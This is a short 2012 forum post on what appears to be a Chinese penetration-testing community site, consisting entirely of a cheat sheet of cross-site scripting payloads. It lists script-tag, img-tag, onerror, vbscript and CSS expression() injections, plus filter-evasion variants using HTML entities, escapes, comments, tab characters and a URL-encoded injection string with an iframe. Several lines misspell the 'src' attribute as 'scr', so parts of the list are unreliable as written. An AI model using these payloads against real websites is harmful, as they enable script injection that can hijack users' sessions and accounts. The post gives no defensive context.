中国网络渗透测试联盟

Title: xss

Author: admin    Time: 2012-9-15 14:09
Title: xss
<script>alert("跨站")</script>    (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascrip&#116&#58 alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">

"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["




